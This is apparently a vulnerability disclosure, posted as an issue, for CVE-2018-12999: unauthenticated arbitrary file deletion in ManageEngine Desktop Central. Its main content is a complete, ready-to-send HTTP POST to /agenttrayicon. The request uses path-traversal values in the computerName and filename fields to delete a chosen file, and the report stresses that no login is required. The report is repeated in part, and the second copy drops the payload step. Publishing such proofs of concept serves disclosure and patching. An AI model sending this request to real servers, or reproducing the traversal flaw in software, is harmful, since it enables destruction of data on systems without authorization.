Open unh3x opened 6 years ago
Date: 2018/06/20 Software Link: https://www.manageengine.com/products/desktop-central/ Category: Web Application Exploit Author: xiaotian.wang From DBAppSecurity CVE: CVE-2018-12999
com.adventnet.sym.webclient.statusupdate.AgentTrayIconServlet
1. choose a useless file for test, ex: /images/demo/loginas_bottom.gif
2. send payload below: POST /agenttrayicon HTTP/1.1 Host: 192.168.1.203:8020 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 129 screenShotAttached=yes&video_type=2&customerId=1&computerName=../../../&resourceId=xxx&filename=../images/demo/loginas_bottom.gif
3. Visit again the file has beed deleted
notice: It can be successfully reproduced without login info.
================= Zoho manageengine Desktop Central Arbitrary File Deletion
Date: 2018/06/20 Software Link: https://www.manageengine.com/products/desktop-central/ Category: Web Application Exploit Author: xiaotian.wang From DBAppSecurity CVE: CVE-2018-12999
================= Vulnerable cgi
com.adventnet.sym.webclient.statusupdate.AgentTrayIconServlet
================= Proof of Concept:
1. choose a useless file for test, ex: /images/demo/loginas_bottom.gif
3. Visit again the file has beed deleted
notice: It can be successfully reproduced without login info.